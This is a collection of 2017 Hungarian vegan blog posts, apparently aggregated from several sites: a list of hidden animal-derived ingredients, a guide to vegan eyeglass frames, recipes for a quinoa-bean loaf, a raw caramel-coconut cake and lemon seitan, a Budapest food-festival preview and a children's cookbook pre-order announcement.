Kér valaki hód végbélmirigy váladékot? Kevés idegesítőbb dolog van annál, mint mikor egy kis tejtermék található a máskülönben növényi termékben. Azonban néhány összetevő még a szinte jól álcázott tejnél is alattomosabb. Íme a tíz legkülönösebb nem vegán összetevő listája, amelyeket megtalálhatsz az egyébként növényi alapú termékekben... A cikk ennek az írásnak fordítása. 1. Cera Alba Ez az alattomos összetevő édességekben és kozmetikumokban (például az ajakír) található meg és talán felismerhetőbb számunkra, amikor a másik nevén szerepel az összetevők felsorolásánál: ez lenne a méhviasz. A méhviaszt a dolgozó méhek állítják elő és a méz tárolásához kialakított helyhez használják fel. Mivel ez egy állati melléktermék, és a méhek kizsákmányolásával jár, így nem vegán. 2. L-Cisztein Ezt az Európában E920-ként ismert vegyületet, amelyet általában madártollból és disznószőrből állítanak elő, olykor péksüteményekbe teszik lisztjavítóként. Ugyan létezik szintetikus változata is, mivel ezt költséges előállítani, így nem túl gyakran fordul elő. 3. Halenyv A borok és sörök előállítása mögötti eljárás állati eredetű összetevők felhasználásával járhat, elsősorban a halenyv felhasználásával, amely más néven az úszóhólyag. Amíg egyre több kézműves sörfőzde hagyja el a halenyvet és egyre több borászat készít vegán italokat, fogyasztás előtt először mindig megéri utánanézni az összetevőknek (ebben segíthet minket a barnivore). 4. Bíborfesték, kármin Ez a vörös ételfesték néha felbukkan ételekben és italokban. Vegánok számára nem alkalmas fogyasztásra, előállítása során a bíbortetveket először összegyűjtik, kiszárítják, majd porítják, hogy megkapják a kívánt erős, vörös festéket. Mintegy 70.000 rovarra van szükség, hogy két kiló bíborfestéket kapjanak. 5. Hódzsír A hódzsírt megtaláljuk némelyik parfümben és számos élelmiszerben (többek között alkoholmentes italokban és pudingokban), valójában egy váladék, amelyet a hódok végbélmirigyéből vonnak ki. A hódok területmegjelölésre használják ezt a váladékot. Vanília illata van, amely magyarázatot ad rá, hogy miért használják fel édességekhez. Az USA Élelmiszer és Gyógyszer Adminisztrációs irányelvei szerint nem használják fel vanília kivonatokban, de megtalálható némely eper-és málnaízű termékben. 6. Lanolin Ellenőrizd az olyan termékek összetevőinek a listáját, mint például a rágógumi (és olyan bőrápoló termékekét, mint az ajakbalzsam), hogy van-e bennük lanolin. A lanolint ,,gyapjúzsírként is ismerik és alapvetően a hajzsírhoz hasonlít: a birkák gyapját vízállóvá teszi ez az anyag. A gyapjúzsírt összegyűjtik és hidratáló krémekhez és némelyik cukrászsüteményhez használják fel. 7. Csontszén A neve alapján egyértelműen állati eredetű ez az összetevő, viszont az már kevésbé nyilvánvaló, hogy miben találjuk meg. Az Egyesült Államokban a csontszenet olykor felhasználják a finomított cukor feldolgozásában, szerencsére az Egyesült Királyságban és Európában nem. Azoknak a cégeknek a listája, amely nem használnak csontszenet itt található. 8. Tejsavó Míg a legtöbb ember tisztában van vele, hogy a tejsavó tehéntejből származik, azt talán nem tudják, hogy milyen sokféle termékben megtalálható. A tejsavó a sajt elállításának a mellékterméke: az a maradék folyadék, amely a tej besűrűsödése és leszűrése után fennmarad. Megtaláljuk a chipsekben (ide tartozik némely sima sós is!), sült árukban és olyan nasikban, mint a keksz. 9. Sellakk A sellakk egy pajzstetű faj nőstényeinek gyantaszerű váladéka, használják cukrászsütemények fényes bevonására, bútorfényezőként és más háztartásban megtalálható terméknél. Pár éve még hanglemezek gyártásánál is használták. A legmeglepőbb használati módja a gyümölcsök fényezése (ha adalékanyagként használják, akkor E904-ként tüntetik fel). Olykor például az almákat vonják be ezzel a fényező anyaggal, hogy a természetes gyümölcs ,,viaszt helyettesítsék vele, amelyet a tisztítási eljárás során eltávolítanak. Szokták még citrusfélék kezelésére használni, hogy ezzel megnöveljék az élettartalmukat. 10. Hozzáadott D vitamin Nem minden D vitamin állati eredetű, de az a legbiztosabb, hogyha feltételezzük, hogy az. Amivel például a reggeliző pelyheket dúsítják, nem vegán, hacsak nincs az ellenkezője a terméken feltüntetve. A D2-vitamin a vegán verzió, és a D3 általában a lanolinból származik (gyapjú), kivéve ha a Vitashine-ról van szó, amely az egyetlen növényi alapú D3-vitamin forrás. Fordítás: A javulás útjai The post 10 érdekes (és nagyon fura) összetevő, amitől nem lesz vegán-kompatibilis egy termék appeared first on VegaNinja.
Lehet a szemüvegem/napszemüvegem nem vegán? Útmutató a tudatos (nap)szemüveg-választáshoz
Ha fontos számodra, hogy mit képvisel, amit viselsz, olvasd el útmutatónkat a különböző alapanyagokról és gyártási módszerekről, amelyekkel a szemüveged készül. Itt a nyár és süt a nap, végre eljött az igazi napszemüvegszezon. Vízparton, városban vagy akár csak úgy is viselhetjük büszkén az új szerzeményünket. De mire figyeljünk, ha napszemüveget választunk? Műanyag Az árskála alján a jellemzően a Távol-Keletről származó fröccsöntött műanyag keretek találhatóak. A kőolaj (petróleum) alapú anyag magas hőmérsékleten, alumínium vagy acél öntőformában nyeri el végleges alakját, permetező festékkel és vegyszerekkel kezelik. A kőolaj bányászata és szállítása, valamint a műanyag előállítása is köztudottan terheli a környezetet. Előállítása tömeges és olcsó, emellett rendkívül sokféle módon lehetséges, így egyáltalán nem lehet kizárni, hogy állati eredetű összetevőt, jellemzően zsírokat is tartalmaz. Ami tetézi a bajt, hogy a gyártó a legtöbb esetben nehezen lenyomozható, így rákérdezni sem lehet. Ha a környezettudatosság fontos szempont, az olcsó műanyag a legrosszabb választás. Mi a helyzet a fém keretekkel? Népszerű és divatos választás a fém szemüvegkeret. Jellemzően vékonyabbak, kevesebb anyagból készülnek, így könnyűek, illetve van, aki az orrnál a papucsos illeszkedést preferálja. Ha ilyen keretet szeretnél, válassz acélból vagy titánból készült keretet. Mindkét fém újrahasznosítható, sőt a modern acél 60%-a újrahasznosított forrásból származik. A titán biokompatibilis, így nem okoz allergiás reakciót a bőrön, ezért használják számos orvosi eszköznél, és pl. szemüvegeknél is. Az acél gyártásához egyes esetekben állati eredetű zsírokat használnak, így ha tudsz, mindig kérdezz rá a gyártónál. Az acélhoz képest a titán előállítása kevesebb energiát emészt fel a, emiatt a többi fémhez képest környezetkímélőbb, emellett 100%-ig vegán is. (A titán egyik vegyülete, a titánium-dioxid sok cruelty-free konzmetikai termékben, sőt, sok sorozatban gyártott vegán élelmiszerben is benne van). A fa nem lehet nem vegán, ugye? Egyre több független gyártó készít fából szemüvegkeretet világszerte. A teljes egészében fából készült keretek természetesen megújuló forrásból származnak, és a nagy többségük (ha nem felületkezelték valamilyen ezt megakadályozó anyaggal) biológiailag lebomló. Két dolgot kérdezz meg minden esetben az eladótól/gyártótól, hogy használtak-e ragasztóanyagot az előállítása során, és ha igen, milyet. Ez azért fontos, mert az iparban használt gyakori faragasztó az enyv, ami állati eredetű, készítése során állatok csontjából és bőréből vonják ki a glutin nevű anyagot. A másik fontos kérdés, amit fel kell tenni, hogy milyen felületkezelő anyagot használtak. A fa szemüvegkereteket gyakran méhviasszal kezelik, amely vízhatlanságot és csillogást kölcsönöz a fának, de gyakran a méhek életébe kerül. 3D nyomtatott bioműanyag A kukoricakeményítőből vagy cukornádból készülő PLA (polylactic acid) bioműanyag 100%-ig vegán és környezetbarát alternatíva. Szállításával nem keletkezik károsanyag-kibocsátás, mivel a gyártás helyben történik. Megújuló forrásból származik és biológiailag lebomlik. Boltokban ilyet jelenleg nem találsz, de megrendelheted ITT. Forma V – Magyar gyártású, vegán, környezetbarát 3D nyomtatott napszemüveg a Vegán Optikától A préselt cellulóz-acetát A cellulóz-acetát (vagy ahogy a szemüvegiparban hívják, csak szimplán acetát) egy allergiát nem okozó, 100% növényi alapú műanyag. Kevesen tudják, hogy ez az anyag a 1940-es években váltotta le az előtte használt törékeny és problémás műanyagokat a prémium minőségű szemüveggyártásban. A ma kapható acetátok erősek, könnyűek és rugalmasak. A cellulóz-acetát átlátszósága és színválasztéka nagymértékben variálható. A komplexebb színezés több eltérő színű és átlátszóságú réteg egymásra préselésével oldható meg. A cellulóz-acetát az iparban használt műanyagoktól eltérően nem kőolaj alapú, hanem természetes anyagokból, gyapotból és farostból készül. A petróleum-alapú műanyagok terhelik a környezetet, az acetát nem, mert megújuló forrásból származik. Vegán környezetbarát napszemüveg, Jack&Francis KADE a Vegán Optikától A szemüvegekhez használt cellulóz-acetát a farost- és gyapotrétegek egymásra préselésével készül, az így létrejött nagy tömböket vékony szeletekre vágják majd CNC marógéppel kifaragják a szemüvegformát. Ezután következik a kifaragott szemüvegkeret és a szárak csiszolása, amely történhet kézzel vagy koptatógéppel is. Az alábbi videón láthatod, ahogy a CNC gép szemüvegkeretet farag: Mivel a növényi alapanyagok feldolgozása teljes egészében mechanikusan történik, elhanyagolható mennyiségű vizet és vegyszert használnak fel a gyártása során, így ha a boltok polcain meglátsz egy acetátból készült szemüveget, közel 100%-ig biztos lehetsz benne, hogy állati eredetű összetevőt sem tartalmaz. Amellett, hogy a cellulóz-acetát megújuló forrásból származik, alkalmas a biológiai bomlásra is. A leginkább fenntartható műanyagok közé tartozik, és ideális a szemüveggyártásra, mivel hipoallergén, megújuló anyagokból származik, biológiailag lebomlik, emellett könnyű és erős. A legtöbb közép- és felső kategóriás napszemüvegmárkának vannak acetát keretek a kínálatában. Összefoglalva, a fémkeretek kedvelői számára a legjobb választás a titán, amely vegán, biokompatibilis és a többi fémhez képest kevesebb energiát igényel gyártása során. A fakereteknél az enyvhasználatra és a méhviaszos kezelésre kell minden esetben rákérdezni. A boltokban kapható műanyag keretek közül pedig az acetát az, amely választásával a legtöbbet teszel a környezetedért. 100%-ig vegán acetát napszemüvegeket rendelhetsz a Vegán Optikában is. Slezák Balázs Források: https://www.veganoptika.hu/tudatos-vegan-szemuvegvalasztas http://www.solvay.com/en/binaries/Cellulose-Acetate_Brochure_en_low-170415.pdf https://www.fetcheyewear.com/blog/post/all-about-acetate http://ezermester.hu/cikk-2156/Valodi_faanyagokhoz_hasznaljunk_enyvet http://vegan.org/frequently-asked-questions/ http://www.popularwoodworking.com/techniques#slsearch-perfect-wax-finish The post Lehet a szemüvegem/napszemüvegem nem vegán? Útmutató a tudatos (nap)szemüveg-választáshoz appeared first on VegaNinja.
Babos quinoa fasírt (gluténmentes, vegán)
A következő receptem konzerv-babból (is) készült. Érdekelt már régóta, hogyan kezdődött a konzervgyártás története. Ki gondolná, hogy egészen Napóleonig kell visszatekintenünk? Az alábbi érdekességekett találtam róla. Amikor az ember elkezdett földműveléssel foglalkozni és egész évben használatos élelmiszereket termeszteni, mély ismereteket szerzett, és szoros kapcsolatot teremtett táplálékforrásaival. Az ipari forradalom, nemrégiben pedig a korszerű élelmiszeripari technológia mindezt megváltoztatta. A konzerv eredete a korai 19. századra tekint vissza, mikor Napóleon csapatainak súlyos élelmiszerhiánnyal kellett szembenézniük. 1800-ban Bonaparte Napoleon 12.000 frank jutalmat kínált fel annak, aki egy gyakorlati módszerrel tud szolgálni az élelmiszerek tartósításához a menetelő hadseregeknek; ahogy ismert mondása szól: Egy hadsereg a gyomrán menetel. Évekkel a kísérletei után, Nicolas Appert előterjesztette találmányát, miszerint az ételeket egy üvegbe kell zárni, majd megfőzni, mellyel megnyerte a díjat 1810-ben. Azt követő évben Appert nyilvánosságra hozta LArt de conserver les substances animales et végétales (avagy Az Állati és Növényi Anyagok Tartósításának Művészete) találmányát, amely az első szakácskönyv volt műfajában a modern tartósító módszerek alapjául szolgálva. 1810-ben a feltaláló személyesen - az 1812-es oroszországi hadjáratára készülő - Napóleontól vehette át a tekintélyes pénzdíjat és az Emberiség Jótevője megtisztelő címet. A francia konzervmester által kitalált módszert egy angol vállalkozó, Peter Duran szabadalmaztatta hazájában alkalmazva Appert technológiáját különböző üveg, cserép, konzerv vagy más anyagokból készült edényeket használva. Erre megkapta az első konzerválási szabadalmat III. György királytól. Ezt vehetjük a modern konzervgyártás gyökerének. A szabadalmat továbbadta két vállalkozónak, Bryan Donkinnak és John Hallnak, akik 1813-ban megnyitották a történelem első komoly, a mai konzervekhez már hasonlító dobozokat gyártó üzemüket. Előállításuk akkoriban még elég nehézkesen történt: a konzervdobozokat ónozott vaslemezből gyártották és egy képzett dolgozó is csak hat darabot tudott összeforrasztani óránként. A kinyitásához kezdetben kalapácsra és vésőre volt szükség. A cég termékei - ügyes marketing segítségével - nagy népszerűségre tettek szert: kóstolót küldtek a királyi családnak, az admiralitásnak és a Királyi Természettudományos Akadémia, a Royal Society tagjainak, a visszaküldött véleményeket pedig hírlapokban publikálták. 1818-ban az angol haditengerészet már 25 ezer dobozzal rendelt ezekből a termékekből. Forrás1. Forrás2. A recept Hozzávalók: - 1 bögre quinoa - 1 konzerv vörösbab/vesebab - 1 ek fűszerpaprika - 1 tk őrölt köménymag - 1 púpos tk (házi) ételízesítő - 2-3 gerez összetört fokhagyma - só Elkészítés: A quinoa-t főzés előtt áztatjuk kb. 5-10 percet majd alaposan átmossuk és enyhén sós vízben puhára főzzük. Főzésnél a víz ellepje, de nem kell kétszeres mennyiségű víz. A babkonzervet kinyitjuk, lecsepegtetjük, majd átöblitjük. Amikor a quinoa már szinte megfőtt, hozzákeverjük. Fűszerezzük az összezúzott fokhagymával, ételízesítővel, őrölt köménymaggal és a fűszerpaprikával. Ha úgy érezzük, nem elég fűszeres, még igény szerint tehetünk hozzá. Ha a fasírtmassza nem állna össze, zabpelyhet vagy zabpehely lisztet keverjünk hozzá. Valamilyen kisebb tepsit kibélelünk sütőpapírral, a masszát belekanalazzuk, lesimítjuk és 180 fokon kb. 20-30 perc alatt átsütjük. Sütés után rácson hagyjuk kihűlni, majd amikor már picit kihűlt, ehetőre, akkor szeleteljük. Fehérrépát, répát és swede/turnip-t szeletekre vágva, rövid ideig forró, sós vízben megpárolva majd sütőpapíros tepsiben fokhagymás olajjal meghintve enyhén barnulósra megsütve ettünk hozzá köretként. Nagyon finom volt. Természetesen ha Magyarországon nem elterjedt ez utóbbi, nem kell kétségbe esni, bármiféle más zöldséges köret illik hozzá (répa, petrezselyemgyökér, cékla, édesburgonya, csicsóka, csak hogy ötletet adjak). (A swede vagy turnip nyersen a karalábéhoz hasonlít ízében, szilárdságában a zellergyökérhez. Viszont ha megfőzzük "besárgul", vagyis fehérből sárga színű zöldségben lesz részünk. Ízét tekintve pedig a krumpli/karalábé/zeller keresztezésére hasonlít. Viszont wikipédia szerint a zöldség a káposzta és a fehérrépa keresztezéséből létrejött növény gyökere.)
A negyedik születésnapi torta (nyers, laktózmentes, gluténmentes, vegán)
2017. május 10. Zizi kalandjai
El sem hiszem, hogy a nagyobbik kisfiam, Ádi már négy éves lett! Tisztán emlékszem a születésének minden pillanatára, az első fogának kibújására, az első önálló lépéseire, amikor tíz hónapos kora körül elkezdődött az übercukiság időszaka, ami azóta is tart, csak most már kiegészül gondolkodással, értelemmel. Két gyerek anyukájaként látom most már, hogy minden gyerek más és más, nagyon különbözőek a testvérek is. Ádi is teljesen más gyerek, mint Ákos. Persze huncutságban, zsiványságban nincs akadály egyikőjüknél sem! Nagyon nehéz két zsivánnyal a mindennapokat “túlélni”, de ilyenkor Éva barátnőm szavai csengenek a fülemben: “Ezeket az éveket senki nem adja vissza nekünk! Töltsünk velük olyan sok időt, amennyit csak tudunk!” Ádi már magyarázó kiskrapek hihetetlenül jó humorral. Folyamatosan kérdez, nem győzünk a kérdéseire válaszolni és persze olyan kérdésekkel is bombáz, amire nem tudjuk a választ (gyorsan utánanézünk a neten, hogy képbe kerüljünk az adott témával kapcsolatban )! Nehéz vele lépést tartani, de igyekszünk. Imád kuktáskodni a konyhában, ezért is kapott egy ilyen szettet a ajándékba. A szülinapját megint csak a biopiacon ünnepeltük szűk családi és baráti körben, ahogyan tavaly is. Annyira szuper a helyszín, minden adott a piknikezéshez, rohangáláshoz, játszóterezéshez és finom ételekhez. Hasonló dolgokat készítettem, mint tavaly, olyanokat, amelyeket könnyű enni két rohangálás között gyerekeknek és felnőtteknek is. A tortát együtt választottuk ki Ádival. Az alaprecept a The Happy Pears srácoktól származik, kicsit módosítottam rajta. Az alapja magos-datolyás-vaníliás, középen van egy isteni karamell réteg, a tetején pedig egy egyszerű kókuszkrém. Igen, krém, bár többen az Instagram fotó alapján kókusztejszínhabnak gondoltátok. Nagyon-nagyon tömény torta, elég belőle egy vékony szelet. Nagy kapcsos formában készült, így bőven jutott mindenkinek. Nyers vegán karamell-kókuszkrém torta Mentés Nyomtatás Előkészítési idő 15 perc Főzési idő 1 óra Teljes idő 1 óra 15 perc Könnyen elkészíthető nyers vegán karamell-kókuszkrém torta. Tömény, de nagyon finom! Szerző: Zizi Recept típusa: sütemény, torta, nyers Konyha: vegán, gluténmentes Adag/mennyiség: 8-10 főre Hozzávalók Torta alaphoz: 100 g dió 100 g kesudió 105 g friss datolya, kimagozva 2 evőkanál extra szűz kókuszzsír 1 evőkanál kókuszreszelék ¼ teáskanál őrölt vanília Karamell krémhez: 375 g friss datolya, kimagozva 180 g mandulavaj 9 evőkanál víz 4 evőkanál extra szűz kókuszzsír ½ teáskanál őrölt vanília késhegynyi só Kókusz krémhez: 2 konzerv kókusztej (jó minőségű, 60% kókusz tartalmú), használat előtt hűtőbe téve 2-4 órára 2 evőkanál agavészirup ¼ teáskanál őrölt vanília Tálaláshoz: friss eper Elkészítés Tegyük a diót és a kesudiót a robotgépbe és aprítsuk szemcsésre. Ekkor adjuk hozzá a datolyát, a szobahőmérsékletű kókuszzsírt, kókuszreszeléket, és vaníliát. Dolgoztassuk a gépet addig, amíg a torta alapunk összeáll tésztává. A tortaformát béleljük ki folpackkal vagy kenjük ki kókuszolajjal és nyomkodjuk az aljába a datolyás diós-kesudiós keveréket, majd tegyük a hűtőbe megkeményedni, amíg elkészítjük a többi réteget. Mossuk el a robotgép tartályát. Tegyük a mandulavajat, a datolyát, a szobahőmérsékletű kókuszzsírt, a vaníliát és a sót a robotgépbe. Kezdjük el dolgoztatni a gépet és lassan adagoljuk hozzá a vizet. Akkor van kész, ha karamell ízű és nyúlós az állaga, mint a karamellnek. Kenjük ezt a krémet (kicsit nehézkes a nyúlós állaga miatt) a datolyás diós-kesudiós alapra és tegyük vissza a hűtőbe. Vegyük ki a kókusztejet a hűtőből és bontsuk ki. A hideg hatására kettévált a sűrű krémes rész a vizestől. Kanalazzuk ki a krémet mindkét konzervből egy tálkába. A vizes részt tegyük hűtőbe és használjuk fel turmixok készítéséhez. Adjuk a krémhez az agavészirupot és a vaníliát, majd jól keverjük el és kanalazzuk a torta tetejére. Tálalásig tartsuk hűtőben (legalább 2 órát)! Tálaljuk friss eperrel! Jegyzetek 23 cm-es kapcsos tortaformában készült. Feltétlen jó minőségű minél magasabb zsírtartalmú konzerv kókusztejet használjunk ehhez a recepthez. Aszalt datolya is jó a tortához (ha nem kapunk frisset), csak érdemes használat előtt egy fél órára langyos vízbe beáztatni, hogy könnyebben aprítsa a robotgép) Édesítésre agavészirupot használtam, hogy megmaradjon a krém fehér színe, de természetesen használhatunk juharszirupot, vagy datolyaszirupot is. Ebben az esetben a krém drapp, világosbarna színű lesz. 3.5.3226
Gourmet Fesztivál 2017 – Vega szemmel (programajánló)
A tavasz mindig a fesztiválok ideje és egyre több gasztronómiai témájú van Budapesten! Évek óta május közepén rendezik a Gourmet Fesztivált, amelyen jelen vannak Magyarország legjobb éttermei. Mint minden évben én a fesztivál vegetáriánus, vegán oldalára vagyok kíváncsi. Egyik évben sem tömtük degeszre magunkat, de azért mindig van mit megkóstolni. Reménykedtem benne, hogy a Bocuse d’Or vegán témája után, idén a Gourmet-n is megjelenik ez a téma, de hát ez nem történt meg, viszont az egyik téma, az eper, reményre ad okot, hogy sok vegetáriánus vagy vegán fogás születik majd belőle a különböző éttermek standján. Biztató, hogy a fesztivál programjai között jelennek meg vegán témájúak is. A gasztroszínpadon május 20-án szombaton 14 órakor Steiner Kristóf “Mangalica, malacod van” műsora keretében olyan ételekkel varázsolja el a vegánokat és húsevőket egyaránt, mint a vegán “pulled pork” – omlós lencse és jackfruit sült szárított paradicsomos-zsályás mini zsemlében, majonézes káposztasalátával, vagy a kesudiós és ‘titkos összetevő” sajttorta friss eperrel. Ezen tuti ott szeretnék lenni és kóstolót kapni, ugyanis a jackfruit pulled pork-ra már nagyon régóta “fáj a fogam”! Lesz kovászos kenyér bemutató Vajda József és Till Attila tolmácsolásában május 21-én 14 órakor. Igazi kovásszal készült kenyeret fognak sütni. Workshopok egyike lesz május 19-én 18 órakor Stőhr Gréta bemutatója, amelyen meleg dijoni spárgasalátát, tavaszi zöld fűszeres ropogósokkal fog készíteni – tiszta, gluténmentes tavaszi ebéd elkészítése friss, szezonális, bio alapanyagokból. Workshop keretében Jacques Liszt Misi is tart kovászos kenyér bemutatót május 21-én 13:30 órakor, amelyen a kovásszal készült friss kézműves kenyér otthoni elkészítésének fortélyait ismerhetjük meg. A fesztivál részletes programja itt tekinthető meg. Ha kikerül az éttermek menüje is, akkor lehet majd többet tudni, hogy hol, mit lehet megkóstolni a vegetáriánusoknak, vegánoknak, ugyanis két éve végre egy V betűvel jelzik az ilyen fogásokat, így célirányosan lehet majd menni kóstolni. A FESZTIVÁL – időpontja: 2017. május 18-21. – helyszíne: Budapest, Millenáris Park (II. ker., Kis Rókus u. 16-20.) – nyitvatartása: csütörtökön 17-23 óráig, péntektől vasárnapig pedig minden nap 12-23 óráig tart nyitva. – fizetési rendszere: Festipay kártyával, illetve Mastercard PayPass vagy Maestro PayPass kártyával tudunk fizetni, készpénzzel nem! A Festipay kártyát a rendezvény területén felállított feltöltőpontokon lehet feltölteni készpénzzel vagy bankkártyával. A kártya egyenlege a fesztivál nyitvatartási ideje alatt bármikor visszaváltható készpénzre. – egyéb tudnivalója: a 14. életévüket be nem töltött gyermekek a rendezvényt ingyenesen látogathatják. Még több információ a fesztiválról, jegyek elővételi lehetőségeiről és a pontos programokról: itt. ***** A fesztiválról korábbi beszámolók itt és itt.
"Mézes"-citromos szejtán párolt spárgával és paradicsommal
2017. április 24. Vegán muflon
Mindenekelőtt hadd magyarázkodjam a majd másfél hónapos szünet miatt, kiváltképp, hogy senkit nem érdekel mindez. A kihagyásnak nagyon prózai oka volt: végérvényesen visszatértem a húsevésre, és második helyen végeztem a bugacgalántai tepertőfőző versenyen. De természetesen csak viccelni próbáltam. Valódik ok nem más, mint hogy most ért véget a hormonkezelésem, és a továbbiakban Pölöskei-Vackor Mária művésznéven próbálok betörni a magyarnóta-énekesi színtérre. Idő közben fellépőruhámat is megvarrtam. Most pedig néhány lényegi információ: A kilencöves tatu nem hord magánál papírzsepkendőt. Humphrey Bogart már jó ideje képtelen áfonyalével gargarizálni. Egyes skandináv országokban illetlenség temetésen csárdást járni. És akkor szakmai hozzávalók: A szejtánhoz: 200g búzasikér 70g búzaliszt 2 ek olívaolaj 1 ek vegamix (vagy hasonló természetazonos ételízesítő) 1 ek zabpehely só A pácléhez: 4 ek olívaolaj 2 ek agaveszirup 1 citrom leve 2 tk dijoni mustár A sallanghoz: 500g spárga 10-15 szem koktélparadicsom 2 gerezd fokhagyma 4 ek világosabb szójaszósz 2 gerezd fokhagyma 3 ek olívaolaj A szejtánport, a lisztet és a többi hozzávalót óvatlanul elkeverjük, megsózzuk, majd hozzáadjuk a vizet és összegyúrjuk. Az így kapott szürkeállomány állagú esszenciát fél óráig hagyjuk békében, és figyelmeztessük hozzátartozóinkat, hogy ne ijedjenek meg tőle. Ezt követően 4 egyforma részre vágjuk, és jó 3/4 óráig főzzük zöldségleves-alaplöttyben. A megfőtt és kihűlt szejtánt mélységes rutinnal telítődve 1-2 cm vastag szeletekre vágjuk, majd beborítjuk a páclével, melynek összetevőit már előzőleg összekevertük, mint a sicc. Minimum egy órát akkor is hagyjuk békében, ha már saját hozzátartozóink vádlijából is harapnánk az éhségtől! Utána száraz serpenyőben mindkét oldalát megsütjük, ha túl száraz, locsolhatunk hozzá a pácléből. Közben a spárga fás szárát lenyiszatoljuk, a koktélparadicsomot félbevágjuk, és egy edényben beborítjuk a szójaszószos-fokhagymás-olívaolajas eleggyel. Egy óra áztatás után az egész hóbelevancot megpároljuk közepes lángon a szójaszószos cuccban. De a spárga roppanós maradjon, különben ótvar végeredményt kapunk!
Mit eszik a vegagyerek? szakácskönyv! :)
2017. április 20. Zizi kalandjai
Téli álmából felébredni látszik a blogomon, vagy inkább téli álomba szenderül, ahogyan a mai időjárás viselkedett… egy fantasztikus hírt oszthatok meg veletek. A válasz arra, hogy miért aludt a blog egy ideig, az az, hogy írtam/írok egy újabb szakácskönyvet, amelyet már néhányan nagyon vártatok! Amikor a Vegán Reggeli megjelent többen jeleztétek, hogy nagyon örültök neki, megvettétek, csodaszép, de mikor írok már vegagyerekes szakácskönyvet. A válaszom erre, hogy MOST! A Vegán Reggeli után jött egy kis “lazítás”, majd belevetettem magam újra a recept tesztelésekbe. Főztem, ettünk, főztem, ettünk… tesztelték az ételeket az 1 éves és 3.5 éves családtagok, vagyis a vega gyerekek is. Azt hiszem mindegyik recept átment a teszten: “Anya, ezt berakhatod a könyvbe!” – jött a válasz. A Mit eszik a vega gyerek? a mindennapok gyakorlatából összegyűjtött több mint 60 bevált recept (egy részük már megjelent a blogon, de a receptek többsége teljesen új) ennek megfelelően kizárólag természetes növényi alapanyagok (zöldségek, gyümölcsök, gabonák és magvak) felhasználásával készül (vagyis nem tartalmaz semmilyen állati eredetű élelmiszert: tejterméket, tojást, mézet, halat és húst), így mind a vegetáriánus, mind a vegán étrend iránt elkötelezettek, mind pedig a növényi alapú ételek iránt csak érdeklődők számára is remek útmutatásként szolgál. Ezenkívül a könyvben szereplő több recept hasznos forrása a gluténmentes és a cukormentes táplálkozást követőknek, a feltüntetett allergének pedig segítenek azoknak, akiknek valamilyen táplálékallergiára is ügyelniük kell. Ez nem egy hozzátáplálási kézikönyv! A könyvben szereplő receptek 1 éves kortól 101 éves korig (vagy azon túl ) fogyaszthatóak, tehát egy teljes család számára biztosít könnyebb, egyszerűbb, gyorsabb és ráérősen készítős recepteket is, amelyek dietetikus által lettek ellenőrizve! A könyv öt fejezetre van bontva: reggeli, ebéd, vacsora, parti/desszert és alapreceptek. Az egyes fejezetekben lévő receptek jól kombinálhatók egymással. A reggelik édes ízvilágúak (turmixok, juice-ok, palacsinták, kásák), de ha valami sósra vágyunk, akkor a vacsora fejezet egyik kencéjét elkészítve máris van sós reggelink (meg inspirálódhatunk a Vegán Reggeli könyvből is). Az ebéd fejezet főtt ételek teljes sorát gyűjti csokorba. Nagyon sok a zöldséges gabonafasírt, a ragu, de van főzelék is. A vacsora részben is vannak meleg ételek, gyorsan elkészíthető levesek, tészták, de zöldség-hüvelyes kencék, valamint egy alap saláta is feltűnik. A parti/desszert rész többnyire édes dolgokat takar, de van benne egy-két sós finomság is – csakis olyanok, amelyek egy gyerekzsúron is megállják a helyüket és élvezettel fogják fogyasztani a gyerekek és a szüleik is. Az alapreceptek fejezet pedig olyan receptekből áll, amelyek alapok lehetnek a konyhánkban és többféle étel elkészítéséhez fel tudjuk őket használni, ilyen például a házi vegán parmezán, a kesudióvaj, a villámgyorsan elkészíthető ketchup, a szezámmagos (hamburger) zsemle vagy a kókuszjoghurt. Nagyon izgulok, mert a fotókat most én készítettem… remélem tetszeni fog nektek! Ezenkívül található a könyvben egy használati útmutató: bevásárláshoz, főzéshez, sütéshez ad tippeket, ötleteket. Írok a az egészséges táplálkozásról, hogy nekünk mi vált be, hogyan tudjuk rávenni a gyerekeket a spenót, a saláta vagy akár egy quinoa tabulé megevésére. A legbüszkébb pedig arra vagyok, hogy a Pécsi Tudományegyetem Egészségtudományi Kar Dietetikai és Táplálkozástudományi Intézete vállalta, hogy szakvéleményt (tudományos tényekkel alátámasztott bevezetőt) ír a könyvemhez! Hálás köszönetem Erdélyi Attila III. éves dietetikus hallgatónak, Szabó Zoltán szakoktatónak és Prof. Dr. Figler Mária egyetemi tanárnak, hogy vállalták ezt a nemes feladatot és alátámasztják a vegán táplálkozás fontosságát. A Mit eszik a vega gyerek? egy vegán szakácskönyv, amely bemutatja, hogy a növényi étrenden belül is létezik a gyermekek kitűnő egészségéhez vezető, teljes értékű vegyes táplálkozás. Külön köszönet a Boook Kiadónak, hogy láttak, látnak fantáziát a témában, a kiadó vezetőjének Széplaki Péternek, Földi Hajnal művészeti vezetőnek, B. Tier Noémi szerkesztőnek, Lukács Eszter dietetikusnak. Ezer hála a kiadó többi kollégájának: Adrinak, Kingának, Matyinak, Csillagnak, Enikőnek, Bereznay Tamásnak, Tóth Milánnak és Erdőháti Áronnak a sok segítségért. A könyv nem jöhetett volna létre a családom (szüleim, öcsém), Iván és természetesen a vega gyerekek (Ádám és Ákos) támogatása nélkül! A Biorganik egy fantasztikus cég, akik elláttak alapanyagokkal és támogatják a könyv létrejöttét. A Monkie (SkipHop Magyarország) nagyon sok eszközt biztosított a fotózáshoz, a Planetbio az utolsó pillanatban a segítségünkre érkezett egy nagy tasak kakaóbabtörettel és persze ott vannak a konyha angyalai: Gacsó Anikó (Bébispenót), Szabó Jucus (5hozzávaló) és Kósa Gabi (Rakottkert), akik káprázatosan főztek, sütöttek és a kezem alá dolgoztak a könyv fotózásakor. Nélkületek nagyon nehéz lett volna, csajok! Hashtag, amit a könyvvel kapcsolatban használhattok a social media felületeken: #miteszikavegagyerekszakacskonyv. Speciális előrendelési akció keretében 2017. április 30-ig csak most csak nektek a könyv a weboldalamon 25%-os kedvezménnyel, 3367 Ft-os áron megrendelhető az alábbi linken! A könyv várható érkezése: 2017. május vége! A sikeres megrendelésről pár percen belül emailben értesítek mindenkit, amelyben minden információ szerepelni fog a fizetés, a személyes átvétel és a szállítás módjáról. 2017. május 1-től pedig 20%-os kedvezménnyel (3592 Ft) lehet majd a könyvet előrendelni az adott linken! 25%-OS KEDVEZMÉNNYEL 4490 FT HELYETT 3367 FT! NAGY ZITA: MIT ESZIK A VEGA GYEREK? (Könyvrendelés!) Zizi új könyve 